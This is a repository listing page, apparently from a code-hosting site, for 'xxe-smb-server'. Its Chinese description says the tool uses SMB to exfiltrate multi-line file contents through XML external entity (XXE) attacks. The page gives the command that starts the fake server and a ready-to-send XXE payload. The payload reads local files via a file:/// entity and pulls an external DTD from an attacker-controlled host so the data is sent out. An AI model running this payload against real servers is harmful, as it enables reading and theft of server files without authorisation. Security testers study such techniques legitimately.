xxe-smb-server icon indicating copy to clipboard operation
xxe-smb-server copied to clipboard

Published 6 months ago verified publisher icon cwkiller

Metadata

在xxe中使用smb外带多行内容

xxe-smb-server

在xxe中使用smb外带多行内容

运行脚本

python3 xxe-smb-server.py public-ip-address web-port
image-20251107153328698

复制输出的payload发送给服务器 image-20251107153240546

fake server收到请求

image-20251107153423250

payload

<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///">
  <!ENTITY % dtd SYSTEM "http://ip:port/data.dtd"> %dtd;
  ]>
  <data>&send;</data>

file:///可改为其他路径测试

Metadata

97
Stars
13
Forks
97
Watchers

Owner

verified publisher icon cwkiller

Metadata

在xxe中使用smb外带多行内容

Back